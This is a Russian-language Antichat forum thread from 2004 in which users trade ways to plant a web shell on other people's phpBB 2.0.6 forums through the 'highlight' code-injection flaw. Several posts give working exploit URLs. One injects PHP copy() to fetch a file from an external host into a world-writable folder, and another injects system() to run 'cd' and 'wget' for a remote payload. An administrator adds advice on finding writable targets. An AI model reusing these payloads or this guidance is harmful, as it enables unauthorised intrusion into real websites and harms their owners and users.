ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6
  #1  
Старый 27.12.2004, 20:21
Аватар для vega2k
vega2k
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532

Репутация: 0
Arrow Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6

какая команда на запись в другую папку.(отличную от корневой напр. "forum)"


расcказываю как есть...
на одном форуме есть папка доступная к записыванию эта папка называется db

ВОПРОС:
как залить туда шелл, использую эту уязвимость
Цитата:
viewtopic.php?a=http://твой_ремотер&b=твоё_имя_файл а&t=1&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527
- как я понимаю эта команда для записи в корневую папку.

форум phpBB 2.0.6

Уважаемые, только не молчите.
 
Ответить с цитированием

  #2  
Старый 27.12.2004, 22:27
Аватар для illusion
illusion
Новичок
Регистрация: 07.12.2004
Сообщений: 27
Провел на форуме:
0

Репутация: 0
Отправить сообщение для illusion с помощью ICQ
По умолчанию

Для начала зделай cd <путь>, а вот потом уж заливай!
Что-то типа:
viewtopic.php?xxx=cd <путь>;wget <адрес твоего ремоута>&t=1&highlight=%2527.system($_GET[xxx]).include%2527
 
Ответить с цитированием

  #3  
Старый 27.12.2004, 23:49
Аватар для vega2k
vega2k
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532

Репутация: 0
По умолчанию

нет, illusion
что-то не подходит, мне кажется ты не втом порядке записал.
 
Ответить с цитированием

  #4  
Старый 28.12.2004, 18:16
Аватар для vega2k
vega2k
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532

Репутация: 0
По умолчанию

хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?
 
Ответить с цитированием

  #5  
Старый 28.12.2004, 20:04
Аватар для Егорыч+++
Егорыч+++
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

Цитата:
Сообщение от vega2k  
хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?
нет не так.. ищи папку в которую запись разрешена.. или хотя бы файл в который можно писать...
 
Ответить с цитированием

  #6  
Старый 28.12.2004, 21:08
Аватар для vega2k
vega2k
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532

Репутация: 0
По умолчанию

admin drwxr-xr-x
cache drwxr-xr-x
db drwxrwxrwx
docs drwxr-xr-x
images drwxr-xr-x
includes drwxr-xr-x
language drwxr-xr-x
templates drwxr-xr-x
common.php -rw-r--r--
config.php -rwxrwxrwx

пишу,

viewtopic.php?a=http://www.hot.ee/vega2k/1.hp&b=&b=/db/dhelp.php&t=44&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527

и ни чего не выходит, не записывается.

а вот на другом форуме, где есть доступ на запись в саму папку форума, я могу и вдругие папки записывать, которые находяться не в папке форума а чуть выше (по дереву)

Последний раз редактировалось vega2k; 28.12.2004 в 21:11..
 
Ответить с цитированием

  #7  
Старый 29.12.2004, 12:30
Аватар для onyx3
onyx3
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме:
0

Репутация: 0
По умолчанию

А какой командой можно посмтатреть какие папки открыты на запись???
 
Ответить с цитированием

  #8  
Старый 29.12.2004, 12:43
Аватар для Егорыч+++
Егорыч+++
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

vega2k так может та команда что ты пишешь не работает просто на сервере?
 
Ответить с цитированием

  #9  
Старый 29.12.2004, 14:44
Аватар для madnet
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719

Репутация: 1384


Отправить сообщение для madnet с помощью ICQ
По умолчанию

2onyx3 Вот этой ls -l
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

  #10  
Старый 29.12.2004, 17:30
Аватар для vega2k
vega2k
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532

Репутация: 0
По умолчанию

Егорыч+++, хех, возможно...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25
Что означает сия комбинация на форуме phpBB 2.0.6? dump Форумы 3 24.12.2004 18:06
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Форумы 6 23.12.2004 22:12
Форум phpBB 2.0.6. Вопрос про админ панель T-REX Форумы 11 07.10.2004 19:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ